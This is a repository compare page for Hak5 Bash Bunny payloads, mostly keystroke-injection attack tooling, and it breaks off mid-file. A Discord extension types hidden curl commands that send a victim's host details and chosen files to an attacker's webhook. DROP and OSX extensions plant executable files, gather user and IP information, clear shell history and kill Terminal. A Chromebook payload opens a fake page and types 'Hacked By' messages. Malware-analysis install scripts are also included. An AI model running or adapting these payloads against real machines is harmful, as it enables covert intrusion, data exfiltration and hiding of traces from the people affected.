hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Compare commits

base: hak5:86e50b69d2fd0cddefe874148457ca6988440acf
Branches Tags
hak5:master
hak5:revert-583-master
hak5:cleanup
hak5:v1.2
hak5:v1.1
hak5:v1.0
...
compare: hak5:e7147a2b1dfba8de2eea6576b9bd5d78cb46f7f8
Branches Tags
hak5:master
hak5:revert-583-master
hak5:cleanup
hak5:v1.2
hak5:v1.1
hak5:v1.0

33 Commits
86e50b69d2 ... e7147a2b1d

Author SHA1 Message Date
Jules Nieves e7147a2b1d
Merge c1612f99c8 into 8d901a02a8 2024-09-25 22:55:59 -04:00
Peaks 8d901a02a8
Merge pull request #318 from bg-wa/drop 
[Extension + Payload] The Ol'Drop'n'Run
 2024-09-05 12:12:31 -04:00
Peaks 14fa7c490e
Merge pull request #322 from bg-wa/cross-platform-cmd-prompt 
Cross platform command prompt extension
 2024-09-05 12:04:31 -04:00
Peaks 2559d728b1
Merge pull request #376 from thedragonkeeper/keylogger 
KeyLogger
 2024-09-05 12:01:41 -04:00
Peaks 257081013d
Merge pull request #650 from quentinlamamy/master 
Submit Discord exfiltration extension + Github Information Exfiltration Payload
 2024-09-03 12:11:48 -04:00
Peaks e6c3876429
Merge pull request #328 from GermanNoob/SEWAIT 
[EXTENSION] SEWAIT - social engineering wait - a small extension to DarrenKitchen's wait
 2024-09-03 12:07:02 -04:00
Peaks 0e51172697
Merge pull request #345 from Zappus/master 
New IR Payload - MalwareBunny
 2024-09-03 11:56:19 -04:00
Quentin Lamamy 5ce34d6819 Update OSX Extension 2024-09-02 04:38:47 +02:00
Quentin Lamamy a57046358b
Merge branch 'hak5:master' into master 2024-09-02 04:35:16 +02:00
quentinlamamy 5cfae30936 Add github information exfiltration payload 2023-08-20 12:06:24 +02:00
quentinlamamy 971a981c9f Submit Discorde exfiltration extension 2023-07-31 18:56:30 +02:00
TheDragonkeeper 963c000ab9 added keylogger 2019-04-06 00:50:03 +01:00
Julz4455 c1612f99c8
Delete index.html 2019-02-08 23:05:02 -05:00
Julz4455 40834a14b1
Delete payload.txt 2019-02-08 23:04:47 -05:00
Julz4455 049d431d58
Delete README.md 2019-02-08 23:04:34 -05:00
Julz4455 315ba42d69
Add payload and html from upload 2019-02-08 23:03:57 -05:00
Julz4455 f360d8caac
Create README.md 2019-02-08 23:03:23 -05:00
Julz4455 d9e9d271ec
Delete Chromebook-Demo 2019-02-08 23:01:01 -05:00
Julz4455 d843fa2b3f
Create Chromebook-Demo 2019-02-08 23:00:31 -05:00
Julz4455 a3d5ed1c3a
Add Payload.txt and index.html from Upload 2019-02-08 22:51:28 -05:00
Julz4455 cbf4512f17
Update README.md 2019-02-08 22:49:59 -05:00
Julz4455 732740a24e
Create README.md for Chromebook Demo 2019-02-08 22:49:37 -05:00
Zappus 4731402ad9 added MalwareBunny 
added MalwareBunny payload
 2018-05-26 09:34:37 -04:00
bg-wa a479964196 Win New file cleanup 2018-02-13 21:57:22 -08:00
bg-wa 17e0b3d50c Multi-OS (Untested) 2018-02-13 21:55:04 -08:00
GermanNoob 18e36a88b0
Create sewait.sh 2018-02-11 12:01:33 +01:00
bg-wa 5f06649cd2 Cross platform command prompt extension 2018-01-30 10:38:52 -08:00
bg-wa 9ab8820cc5 Moved payload to execution folder 2018-01-27 20:45:55 -08:00
bg-wa b3b9f75200 All Working with executable and overwite options 2018-01-27 18:33:25 -08:00
bg-wa 5c764849f3 Check Point 2018-01-27 10:31:59 -08:00
bg-wa afdafb27d6 The Ol'Drop'n'Run 2018-01-27 00:09:35 -08:00
bg-wa 821105a6a3 Cleanup LINUX only... 2018-01-27 00:05:57 -08:00
bg-wa 31ae33e78a Start of drop file 2018-01-26 20:36:59 -08:00
30 changed files with 1496 additions and 0 deletions
Show Stats Expand all files Collapse all files

86
payloads/extensions/discord.sh Executable file
View File

@ -0,0 +1,86 @@
#!/bin/bash
#
# Title: Discord Extension
# Description: Interact with discord webhook to exfiltrate text or files
# Author: quentin_lamamy <contact@quentin-lamamy.fr>
# Version: 1.0
# Category: Extension
#
# To use this extension, you need to create a webhook on discord and get the webhook id and token
# During your setup steps, you need to set the DISCORD_WEBHOOK_ID and DISCORD_WEBHOOK_TOKEN variables
# DISCORD_WEBHOOK_ID="<DISCORD_WEBHOOK_ID>""
# DISCORD_WEBHOOK_TOKEN="<DISCORD_WEBHOOK_TOKEN>"
function DISCORD() {
case $1 in
# @desc Initialize the exfiltration session by posting an embed message on discord with host information
# @usage DISCORD INIT
# @info This command need a $BB_HOST_* variables (Set by default if you use my OSX extension)
"INIT")
curl_location="https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN"
curl_header="Content-Type: application/json"
Q STRING "printf '\e7'"
Q ENTER
Q STRING "curl --location '$curl_location'"
Q STRING " --header '$curl_header'"
Q STRING " --data '{\"embeds\": [{\"author\": {\"name\": \"New exfiltration session\",\"icon_url\": \"https://cdn-icons-png.flaticon.com/512/2/2235.png\"},\"color\": \"15258703\",\"fields\": [{\"name\":\"OS\",\"value\":\""
Q STRING "'\${BB_HOST_OS}'"
Q STRING "\",\"inline\":true},{\"name\":\"Public ip\",\"value\":\""
Q STRING "'\${BB_HOST_IP_V4}'"
Q STRING "\",\"inline\":true},{\"name\":\"Public ip\",\"value\":\""
Q STRING "'\${BB_HOST_IP_V6}'"
Q STRING "\",\"inline\":true},{\"name\":\"User\",\"value\":\""
Q STRING "'\${BB_HOST_USER}'"
Q STRING "\",\"inline\":true}]"
Q STRING "}]}'"
Q ENTER
Q STRING "printf '\e8\e[1A\e[0J'"
Q ENTER
;;
"SEND")
case $2 in
# @desc Send a message to discord via webhook
# @usage DISCORD SEND MSG $yourMessage
"MSG")
if [[ "$3" == *"$"* ]]; then
message="'$3'"
else
message=$3
fi
Q STRING "printf '\e7'"
Q ENTER
Q STRING "curl --location 'https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN' --header 'Content-Type: application/json' --data '{\"content\": \"$message\"}' && printf '\e[3A\e[K\e[0J'"
Q ENTER
Q STRING "printf '\e8\e[1A\e[0J'"
Q ENTER
;;
# @desc Send a file to discord via webhook
# @usage DISCORD SEND FILE $yourFilePath
"FILE")
Q STRING "printf '\e7'"
Q ENTER
Q STRING "curl --location 'https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN' --form '=@\"$3\"' && printf '\e[3A\e[K\e[0J'"
Q ENTER
Q STRING "printf '\e8\e[1A\e[0J'"
Q ENTER
;;
esac
;;
esac
}
export -f DISCORD

103
payloads/extensions/drop.sh Normal file
View File

@ -0,0 +1,103 @@
#!/bin/bash
#
# DROP v1 by bg-wa
# Simplifies dropping files from HID attacks for LINUX
# Usage: DROP [OS] bb_source_file.txt attack_destination_file.txt [overwrite: false] [executable: false]
#
# Example:
# DROP UNITY /root/udisk/payloads/$SWITCH_POSITION/source.sh ~/target_destination.sh true true
source ./run.sh
function DROP() {
os=$1
source=$2
destination=$3
overwrite=$4
executable=$5
case "$os" in
WIN)
RUN WIN powershell
;;
OSX)
RUN OSX terminal
;;
UNITY)
RUN UNITY terminal
;;
LINUX)
RUN LINUX terminal
;;
*)
RUN UNITY terminal
;;
esac
QUACK DELAY 1000
if "$overwrite" == "true"
then
case "$os" in
WIN)
QUACK STRING del "$destination"
;;
*)
QUACK STRING rm "$destination"
;;
esac
QUACK ENTER
QUACK DELAY 500
fi
case "$os" in
WIN)
QUACK STRING fsutil file createnew "$destination"
QUACK ENTER
QUACK DELAY 500
QUACK STRING notepad.exe "$destination"
QUACK ENTER
QUACK DELAY 1000
;;
*)
QUACK STRING vi "$destination"
QUACK ENTER
QUACK DELAY 500
QUACK STRING i
;;
esac
while IFS= read -r data
do
QUACK STRING "$data"
QUACK ENTER
done < "$source"
QUACK DELAY 500
case "$os" in
WIN)
QUACK CTRL s
QUACK CRTL x
;;
*)
QUACK ESC
QUACK ENTER
QUACK STRING :wq
QUACK ENTER
if "$executable" == "true"
then
QUACK STRING chmod +x "$destination"
QUACK ENTER
QUACK DELAY 500
fi
QUACK STRING history -c
QUACK ENTER
QUACK STRING exit
QUACK ENTER
;;
esac
}
export -f DROP

278
payloads/extensions/osx.sh Executable file
View File

@ -0,0 +1,278 @@
#!/bin/bash
#
# Title: OSX Extension
# Description: Allow a bunch of osx interaction
# Author: quentin_lamamy <contact@quentin-lamamy.fr>
# Version: 2.0
# Category: Extension
function OSX() {
case $1 in
"TERMINAL")
case $2 in
# @desc Open a terminal
# @usage OSX TERMINAL OPEN
"OPEN")
Q GUI SPACE
Q STRING terminal
Q ENTER
;;
# @desc Initialize the terminal
# Make the PS1 nicer (just because I like it)
# Grab Host information and store it in BB_OSX vars
# @usage OSX TERMINAL INIT
# @info This command need a focused terminal
"INIT")
Q STRING "bash"
Q ENTER
Q STRING "clear"
Q ENTER
Q STRING "printf '\e7'"
Q ENTER
Q STRING "export PS1='\e[0;31mbashbunny>\e[m '"
Q ENTER
Q STRING 'BB_HOST_USER=$(whoami)'
Q ENTER
Q STRING 'BB_HOST_NAME=$(hostname)'
Q ENTER
Q STRING "BB_HOST_OS='OSX'"
Q ENTER
Q STRING 'BB_HOST_IP_V4=$(curl -s ipinfo.io/ip)'
Q ENTER
Q STRING 'BB_HOST_IP_V6=$(curl -s ident.me)'
Q ENTER
Q STRING "printf '\e8\e[1A\e[0J'"
Q ENTER
;;
# @desc Minimize the terminal
# @usage OSX TERMINAL MINIMIZE
# @info This command need a focused terminal
"MINIMIZE")
Q STRING 'printf \e[2t'
Q ENTER
;;
# @desc Resize the focused terminal
# @usage OSX TERMINAL RESIZE $width $height
# @param <integer> $width The terminal width
# @param <integer> $height The terminal height
# @info This command need a focused terminal
"RESIZE")
Q STRING "printf '\e[8;'$4';'$3't' && printf '\e[2A\e[K\e[0J'"
Q ENTER
;;
# @desc Clear the focused terminal
# @usage OSX TERMINAL ZOOM
# @info This command need a focused terminal
"CLEAR")
Q STRING clear
Q ENTER
;;
# @desc Close all terminal
# @usage OSX TERMINAL CLOSE
# @info This command need a focused terminal
"CLOSE")
Q STRING history -c
Q ENTER
Q STRING killall Terminal
Q ENTER
;;
# @desc Change terminal window name
# @usage OSX TERMINAL NAME <WINDOW_NAME>
# @info This command need a focused terminal
"NAME")
Q STRING "printf '\033]0;'$3'\007' && printf '\e[2A\e[K\e[0J'"
Q ENTER
;;
esac
;;
"NETWORK")
case $2 in
"WIFI")
case $3 in
# @desc Enable wifi
# @usage OSX NETWORK WIFI ENABLE
"ENABLE")
Q STRING "networksetup -setairportpower en0 on"
Q ENTER
;;
# @desc Disable wifi
# @usage OSX NETWORK WIFI DISABLE
"DISABLE")
Q STRING "networksetup -setairportpower en0 off"
Q ENTER
;;
# @desc Connect to a wifi network
# @usage OSX NETWORK CONNECT $ssid $password
# @arg <string> Wifi SSID
# @arg <string> Wifi Password
"CONNECT")
Q STRING "networksetup -setairportnetwork en0 $4 $5"
Q ENTER
;;
esac
;;
"ETHERNET")
;;
esac
;;
"SESSION")
case $2 in
# @desc Shutdown the computer
# @usage OSX SESSION SHUTDOWN
"SHUTDOWN")
Q STRING "osascript -e 'tell app \"System Events\" to shut down'"
Q ENTER
;;
# @desc Restart the computer
# @usage OSX SESSION RESTART
"RESTART")
Q STRING "osascript -e 'tell app \"System Events\" to restart'"
Q ENTER
;;
# @desc Lock the computer
# @usage OSX SESSION LOCK
"LOCK")
Q STRING "osascript -e 'tell app \"System Events\" to sleep'"
Q ENTER
;;
# @desc Logout current session
# @usage OSX SESSION LOGOUT
"LOGOUT")
Q STRING "osascript -e 'tell app \"System Events\" to log out'"
Q ENTER
;;
"GET_USER")
#Q STRING "BB_OSX_USER=$(who | grep console | cut -d ' ' -f 1)"
Q STRING 'BB_OSX_USER=$(whoami)'
Q ENTER
;;
esac
;;
"SOUND")
case $2 in
"PLAY")
Q STRING "afplay $3"
;;
# @desc Change the computer volume
# @usage OSX MISC VOLUME $volumeValue
# @arg <integer> An integer between 0 and 10
"VOLUME")
Q STRING "osascript -e 'set Volume $3'"
Q ENTER
;;
esac
;;
"NOTIFICATION")
case $2 in
"CLEAR")
Q STRING "ps -e | grep /NotificationCenter | grep app | cut -d ' ' -f 1 | xargs kill -9 && printf '\e[2A\e[K\e[0J'"
Q ENTER
;;
"DISPLAY")
if [ -z $6]; then
$6=${1:-"Purr"}
fi
Q STRING "osascript -e 'display notification \"$3\" with title \"$4\" subtitle \"$5\" sound name \"$6\"'"
Q ENTER
;;
esac
;;
"MISC")
case $2 in
# @desc Show or hide desktop icon
# @usage OSX MISC DESKTOP_ICON $action
# @arg <string> HIDE | void
"DESKTOP_ICON")
if [ $3 == "HIDE" ]; then
Q STRING "defaults write com.apple.finder CreateDesktop -bool false && killall Finder"
Q ENTER
else
Q STRING "defaults write com.apple.finder CreateDesktop -bool true && killall Finder"
Q ENTER
fi
;;
# @desc Change wallpaper with the specified url image
# @usage OSX MISC WALLPAPER_URL
"WALLPAPER_URL")
Q STRING "cd ~/Desktop"
Q ENTER
Q STRING "curl $3 > img.bb"
Q ENTER
Q STRING "sqlite3 ~/Library/Application\ Support/Dock/desktoppicture.db \"update data set value = '~/Desktop/img.bb'\" && killall Dock"
Q ENTER
;;
# @desc Say something in the way of bigben
# @usage OSX MISC SAY <VOICE> <TEXT_TO_SAY>
# @info Need a focused terminal
"SAY")
Q STRING "say -v $3 $4 && printf '\e[2A\e[K\e[0J'"
Q ENTER
;;
esac
;;
esac
}
export -f OSX

126
payloads/extensions/prompt.sh Normal file
View File

@ -0,0 +1,126 @@
#!/bin/bash
################################################################################
# Quickly get to a prompt on any platform with the BashBunny
#
# How this works?
# 1) Once the library is included in your payload, launch terminal\powershell\run
# with:
# PROMPT [OS]
# 2) OS options are:
# "AUTO" : Default - Hak5 2124 cross platform code
# "UNITY" : Launches Terminal in Unity
# "UNITY_RUN" : Opens run prompt in Unity
# "MAC" : Launches Terminal in OSX
# "POWERSHELL" : Launches Powershell in Windows
# "WINDOWS_RUN": Opens run prompt in Windows
# 3) To close a prompt use:
# CLOSE_PROMPT [OS]
################################################################################
################################################################################
# Start HID Prompt
################################################################################
function PROMPT() {
if [ -z "$1" ]; then
OS="AUTO"
else
OS=$1
fi
#AUTO
if [ "${OS}" = "AUTO" ]; then
LED G B 100
QUACK ALT F2
QUACK DELAY 50
QUACK GUI SPACE
QUACK DELAY 50
QUACK GUI r
clear_active_input
wait_enter_wait 200 1000
fi
#UNITY
if [ "${OS}" = "UNITY" ]; then
LED R B 100
QUACK GUI
clear_active_input
QUACK STRING terminal
wait_enter_wait 200 1000
fi
#UNITY_RUN
if [ "${OS}" = "UNITY_RUN" ]; then
LED R B 100
QUACK ALT F2
fi
#MAC
if [ "${OS}" = "MAC" ]; then
LED R B G 100
QUACK GUI SPACE
clear_active_input
QUACK STRING terminal
wait_enter_wait 200 1000
fi
#POWERSHELL
if [ "${OS}" = "POWERSHELL" ]; then
LED B 100
QUACK GUI
QUACK DELAY 500
QUACK powershell
wait_enter_wait 200 1000
fi
#WINDOWS_RUN
if [ "${OS}" = "WINDOWS_RUN" ]; then
LED B 100
QUACK GUI r
QUACK DELAY 500
fi
LED 0
}
function CLOSE_PROMPT() {
if [ -z "$1" ]; then
QUACK ALT F4
else
if [ "$1" = "MAC" ]; then
QUACK GUI w
else
QUACK ALT F4
fi
fi
}
# HELPER FUNCTIONS
function wait_enter_wait() {
if [ -z "$1" ]; then
BEFORE_WAIT=100
else
BEFORE_WAIT=$1
fi
if [ -z "$2" ]; then
AFTER_WAIT=100
else
AFTER_WAIT=$2
fi
QUACK DELAY ${BEFORE_WAIT}
QUACK ENTER
QUACK DELAY ${AFTER_WAIT}
}
function clear_active_input() {
QUACK DELAY 50
QUACK BACKSPACE
QUACK DELAY 100
}
export -f PROMPT
export -f CLOSE_PROMPT

23
payloads/extensions/sewait.sh Normal file
View File

@ -0,0 +1,23 @@
#!/bin/bash
# Social engineering wait by GermanNoob
#
# This extension can be used if no hidden access to the victim computer is possible and you have to social engineer your way to the target
# This script will mount as a standard drive and wait until the attacker starts the real payload by changing the switch position
#
# This is just a small extension to DarrenKitchen's WAIT
function SEWAIT() {
LED SPECIAL
ATTACKMODE STORAGE
GET SWITCH_POSITION
TEST=$SWITCH_POSITION
LED SPECIAL2
while true
do GET SWITCH_POSITION
if [ $SWITCH_POSITION != $TEST ]; then break; fi
sleep 1
done
}
export -f SEWAIT

24
payloads/library/ChromeOS/Chromebook-Demo/README.md Normal file
View File

@ -0,0 +1,24 @@
# Chromebook Demo Payload
Author: Julz4455
Version: 1.2
## Description
Send a certain message to the victim of your hack.
This can be a message to lock thier pc or to watch out because of an upcoming hack.
## Configuration
Configure by changing the message, header, hacker name, and finale.
This can help send a certain message to the victim of your hack.
## STATUS
| LED | Status |
| ---------| ----------------------------------- |
| SETUP | Setting up the ATTACKMODE with HID |
| SPECIAL | Setting up Internet and fake page |
| ATTACK | The Attack is being carried out |
| CLEANUP | Cleaning up the Attack with HID |
| FINISH | Attack has been finished |

200
payloads/library/ChromeOS/Chromebook-Demo/index.html Normal file
View File

@ -0,0 +1,200 @@
<!DOCTYPE html>
<!--
/***
* ███╗ ██╗ ██████╗ ████████╗███████╗███████╗ ██╗ ██████╗
* ████╗ ██║██╔═══██╗╚══██╔══╝██╔════╝██╔════╝ ██║██╔═══██╗
* ██╔██╗ ██║██║ ██║ ██║ █████╗ ███████╗ ██║██║ ██║
* ██║╚██╗██║██║ ██║ ██║ ██╔══╝ ╚════██║ ██║██║ ██║
* ██║ ╚████║╚██████╔╝ ██║ ███████╗███████║██╗██║╚██████╔╝
* ╚═╝ ╚═══╝ ╚═════╝ ╚═╝ ╚══════╝╚══════╝╚═╝╚═╝ ╚═════╝
* FAST • EASY • SHORT
* hello@notes.io
* twitter.com/notesio
* fb.com/notesio
*/
-->
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="tr" lang="tr">
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
<title>Online Notes Services | Fast . Easy . Short | Notes.io </title>
<meta name="viewport" content="width=device-width, initial-scale=0.7">
<meta name="description"
content="Notes.io is a web-based application for taking notes. You can take your notes and share with others by providing the shorten url to a friend.">
<meta name="keywords" content="notes,note,online note,online note service,past note,short note,note shortener">
<meta name="google-site-verification" content="4Ugv3pjfk9ljCxFSgXA_cITKo3WzpgkcoWPI2wX1Swk"/>
<link rel="image_src" href="http://notes.io/theme/macNew/images/logo.png"/>
<link href="http://notes.io/theme/macNew/css/notesIO.css" rel="stylesheet" type="text/css"/>
<link href="http://notes.io/theme/macNew/css/reset-min.css" rel="stylesheet" type="text/css"/>
</head>
<body><img src="http://notes.io/theme/macNew/images/background.jpg" class="bg" alt="notes.io background"/>
<div class="mainDiv"><div class="whatIsNotesIO"><img src="http://notes.io/theme/macNew/images/whatisnotesio.png" alt="what is notes.io" /></div> <div class="programArea">
<table width="100%">
<tr>
<td class="barsol"></td>
<td class="barback"><a href="http://notes.io"><img src="http://notes.io/theme/mac/images/logo.png" class="logo"
alt="notes.io logo"/></a>
<div class="slogan">
<img src="http://notes.io/theme/macNew/images/fastEasyShort.png" alt="Fast | Easy | Short"/>
<p>
Notes.io is a Note Shortener // Fast | Easy | Short
</p>
</div>
<div class="menu">
<input id="btnShort" type="button" class="short" value="short"/>
<a href="#" class="comingsoon">Coming Soon</a>
<input id="btnAccount" type="button" class="account" value="Account"/>
<input id="" type="button" class="myNotesDisable" value="Account" /> </div>
</td>
<td class="barsag"></td>
</tr>
</table>
<div class="notesArea">
<textarea id="notesTextAreaID" class="notesTextArea" rows="2" cols="25" autofocus></textarea>
</div>
<table width="100%">
<tr>
<td class="notespagebottom1">&nbsp;</td>
<td class="notespagebottom2">&nbsp;</td>
<td class="notespagebottom3">&nbsp;</td>
</tr>
</table>
</div>
<div class="adverArea">
<div class="close"></div>
<table width="100%">
<tr>
<td class="barsol">&nbsp;</td>
<td class="barback">
<center>
<img src="http://notes.io/theme/macNew/images/whatisnotesio.png" alt="what is notes.io" class="adverWhatsNotes" />
</center>
</td>
<td class="barsag">&nbsp;</td>
</tr>
</table>
<div class="notesArea">
<div class="notesTextArea">
<p>
Notes.io is a web-based application for taking notes. You can take your notes and share with others by providing the shorten url to a friend.
</p><br />
<p><b>Fast:</b> Notes.io is built for speed and performance. You can take notes quickly and browse your archive.</p>
<p><b>Easy:</b> Notes.io doesnt require installation. Just write and share shorten link!</p>
<p><b>Short:</b> Notes.ios url just 8 character. Youll get shorten link of your note when you want to share. (<b>Ex:</b> <a href="http://notes.io/q" style="font-size: 12px"> notes.io/q </a></p>
<p><b>Contact:</b> hello@notes.io</p>
</div>
</div>
<table width="100%">
<tr>
<td class="notespagebottom1">&nbsp;</td>
<td class="notespagebottom2">&nbsp;</td>
<td class="notespagebottom3">&nbsp;</td>
</tr>
</table>
</div>
</div>
<div id="char" class="char">0 KB</div>
<div id="messageback" class="messageback"></div>
<div class="messageBOXback"></div>
<div id="messageBOX" class="message">
<table cellpadding="0" cellspacing="0" style="width: 100%">
<tr>
<td class="auto-style1">&nbsp;</td>
<td class="auto-style2">
<div class="closeBTNpopup" id="shortClose"></div>
<h1>Long File</h1></td>
<td class="auto-style3">&nbsp;</td>
</tr>
<tr>
<td class="auto-style4">&nbsp;</td>
<td class="auto-style9"><p>For written notes was greater than 18KB Unable to shorten.</p>
<p>To be smaller than 18KB, please organize your notes, or sign in.</p></td>
<td class="auto-style5">&nbsp;</td>
</tr>
<tr>
<td class="auto-style6">&nbsp;</td>
<td class="auto-style7">&nbsp;</td>
<td class="auto-style8">&nbsp;</td>
</tr>
</table>
</div>
<div id="msgBOXshort" class="message">
<table cellpadding="0" cellspacing="0" style="width: 100%">
<tr>
<td class="auto-style1">&nbsp;</td>
<td class="auto-style2">
<div class="closeBTNpopup" id="shortClose"></div>
<h1 id="shortNoteH1">Shortened Note Link</h1></td>
<td class="auto-style3">&nbsp;</td>
</tr>
<tr>
<td class="auto-style4">&nbsp;</td>
<td class="auto-style9">
<div id="sonuc"><span><img src="http://notes.io/theme/macNew/images/ajax-loader.gif" class="looding"
alt="Looding Image"/></span></div>
</td>
<td class="auto-style5">&nbsp;</td>
</tr>
<tr>
<td class="auto-style6">&nbsp;</td>
<td class="auto-style7">&nbsp;</td>
<td class="auto-style8">&nbsp;</td>
</tr>
</table>
</div>
<div class="footer">
<p>
<a href="https://itunes.apple.com/us/app/direct-message-for-whatsapp/id1411992307?ls=1&amp;mt=8" target="_blank">Direct
Message for Whatsapp <br/><img src="http://notes.io/theme/banners/directMessageBanner.jpg" width="970" height="250"
title="Type number, press the direct message button and start whatsapp chat without saving new contact.Keep it fast,secret and clean."/></a>
</p>
<p><a href="http://www.sorgulamayap.com" target="_blank">Alan adı sorgulama servisi <br/><img
src="http://notes.io/theme/banners/468-60.gif" title="sorgulama yap"/></a></p>
<p><a href="http://www.md5generator.org" target="_blank">md5 generator<br/><img
src="http://notes.io/theme/banners/banner468-60.jpg" title="md5 generator"/></a></p><a
href="http://www.metromedya.com/tr/hizmetlerimiz/ios-uygulama-gelistirme.html" target="_blank">ios
programlama </a><a href="http://www.iosprogramlama.com" target=”_blank”>ios programlama</a>
<p style="text-align: right;width: 98%">V.2.0.8</p>
<div class="socialArea">
<p>
<iframe src="http://notes.io/socialButton.php" name="myframe" width="162" height="62" frameborder="0"
allowtransparency="true"></iframe>
</p>
<br>
<p>Copyright 2018 <a href="http://www.metromedya.com/en" target="_blank">Metromedya</a></p>
<p>We'd love to hear from you. Please email us at <a href="mailto:hello@notes.io">hello@notes.io</a></p>
</div>
<script type="text/javascript">var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-18039671-1']);
_gaq.push(['_trackPageview']);
(function () {
var ga = document.createElement('script');
ga.type = 'text/javascript';
ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(ga, s);
})();</script>
</div>
<script src="http://notes.io/scripts/jquery-1.6.1.min.js" type="text/javascript"></script>
<script src="http://notes.io/scripts/notes.js" type="text/javascript"></script>
</body>
</html>

66
payloads/library/ChromeOS/Chromebook-Demo/payload.txt Normal file
View File

@ -0,0 +1,66 @@
#!bin/bash
CUCUMBER PLAID
LED SETUP
GET HOST_IP
GET SWITCH_POSITION
ATTACKMODE HID ECM_ETHERNET VID_0x05ac PID_0x021e
MESSAGE="I Will learn to lock my computer"
HEADER="Write the following 20 times: ${MESSAGE}"
HACKER_NAME="Mr. Robot's Son"
FINALE="Understand now?"
LED SPECIAL
cd /root/udisk/payloads/$SWITCH_POSITION
iptables -A OUTPUT -p udp --dport 80 -j DROP
python -m SimpleHTTPServer 80 &
# wait until port is listening (credit audibleblink)
while ! nc -z localhost 80; do sleep 0.2; done
LED ATTACK
Q GUI
Q DELAY 5000
Q STRING "http://${HOST_IP}/index.html"
Q DELAY 750
Q ENTER
Q DELAY 10000
Q CONTROL R
Q DELAY 10000
Q STRING "${HEADER}"
Q ENTER
Q ENTER
i="0"
while [ $i -lt 19 ]; do
Q STRING "${MESSAGE}"
Q DELAY 100
Q ENTER
i=$[$i+1]
Q DELAY 200
done
Q ENTER
Q STRING "${FINALE}"
Q ENTER
Q STRING "Hacked By: ${HACKER_NAME}"
Q ENTER
LED CLEANUP
i="0"
while [ $i -lt 30 ]; do
Q UP
i=$[$i+1]
Q DELAY 100
done
LED W 100
sync
sleep 3
sync
LED FINISH

36
payloads/library/Incident_Response/MalwareBunny/README.md Normal file
View File

@ -0,0 +1,36 @@
# Malware Bunny
## Overview
This Bash Bunny module is used to install many tools used for reverse engineering and malware analysis.
2 Operation Modes
* Web UI for quick access to samples
* SSH access for analysis sessions
## Getting Started
1. Get Bunny to access the Internet
2. Install all tools and components
* or - run setup.sh to install everything
* or - manually install every tool from setup scripts
3. Boot Bunny in Arming mode and upload payload files to switch1 and switch2
4. Boot Bunny in switch1 mode to access web interface
5. Boot Bunny in switch2 mode to access ssh interface
Web interface is meant long analysis sessions with minimal use, therefore CUCUMBER is enabled.
## Software Installed
1. viper v1.2
2. ssdeep v2.14.1
3. yara v3.7.0
4. pyew
6. featherduster
7. capstone
8. binwalk
9. dshell
10. wabt
11. peepdf
12. unzip
13. punbup

45
payloads/library/Incident_Response/MalwareBunny/install/binwalk.sh Normal file
View File

@ -0,0 +1,45 @@
#!/bin/bash
# Title: Malware Bunny
# Description: binwalk install script
# Author: Zappus
# Version: 1.0
# Category: Incident-Response
# Attackmodes: Ethernet
# Firmware: 1.5
apt-get install -y python-lzma python-crypto libqt4-opengl python-opengl python-qt4 python-qt4-gl python-numpy python-scipy python-pip mtd-utils gzip bzip2 tar arj lhasa p7zip p7zip-full cabextract cramfsprogs cramfsswap squashfs-tools sleuthkit default-jdk lzop srecord zlib1g-dev liblzma-dev liblzo2-dev liblzo2-dev python-lzo
pip install cstruct
cd /tools/
git clone https://github.com/ReFirmLabs/binwalk
cd binwalk
git clone https://github.com/devttys0/sasquatch
cd sasquatch/
ls
# edit build file to fix lack of sudo error on make install
# vi build.sh
./build.sh
cd ..
git clone https://github.com/sviehb/jefferson
cd jefferson
python setup.py install
cd ..
git clone https://github.com/jrspruitt/ubi_reader
cd ubi_reader
python setup.py install
cd ..
git clone https://github.com/devttys0/yaffshiv
cd yaffshiv
python setup.py install
cd ..
wget -O - http://my.smithmicro.com/downloads/files/stuffit520.611linux-i386.tar.gz | tar -zxv
cp bin/unstuff /usr/local/bin/
python setup.py install

21
payloads/library/Incident_Response/MalwareBunny/install/capstone.sh Normal file
View File

@ -0,0 +1,21 @@
#!/bin/bash
# Title: Malware Bunny
# Description: capstone install script
# Author: Zappus
# Version: 1.0
# Category: Incident-Response
# Attackmodes: Ethernet
# Firmware: 1.5
cd /tmp/
wget https://github.com/aquynh/capstone/archive/3.0.5-rc2.tar.gz
tar xf 3.0.5-rc2.tar.gz
rm 3.0.5-rc2.tar.gz
mv capstone-3.0.5-rc2/ /tools/capstone
cd /tools/capstone
make
make install
cd bindings/python
make install

29
payloads/library/Incident_Response/MalwareBunny/install/dshell.sh Normal file
View File

@ -0,0 +1,29 @@
#!/bin/bash
# Title: Malware Bunny
# Description: dshell install script
# Author: Zappus
# Version: 1.0
# Category: Incident-Response
# Attackmodes: Ethernet
# Firmware: 1.5
apt-get install -y python-dpkt python-ipy python-pypcap
pip install pygeoip
cd /tools/
git clone https://github.com/USArmyResearchLab/Dshell dshell
cd dshell
cd share/GeoIP/
wget http://geolite.macxmind.com/download/geoip/database/GeoLiteCountry/GeoIP.dat.gz
gunzip -d GeoIP.dat.gz
wget http://geolite.maxmind.com/download/geoip/database/GeoIPv6.dat.gz
gunzip -d GeoIPv6.dat.gz
wget http://download.maxmind.com/download/geoip/database/asnum/GeoIPASNum.dat.gz
gunzip -d GeoIPASNum.dat.gz
wget http://download.maxmind.com/download/geoip/database/asnum/GeoIPASNumv6.dat.gz
gunzip -d GeoIPASNumv6.dat.gz
cd ../../
make

17
payloads/library/Incident_Response/MalwareBunny/install/featherduster.sh Normal file
View File

@ -0,0 +1,17 @@
#!/bin/bash
# Title: Malware Bunny
# Description: featherduster install script
# Author: Zappus
# Version: 1.0
# Category: Incident-Response
# Attackmodes: Ethernet
# Firmware: 1.5
apt-get install -y libgmp3-dev
apt-get install -y libncurses-dev
cd /tools
git clone https://github.com/nccgroup/featherduster
cd featherduster
python setup.py install

33
payloads/library/Incident_Response/MalwareBunny/install/peepdf.sh Normal file
View File

@ -0,0 +1,33 @@
#!/bin/bash
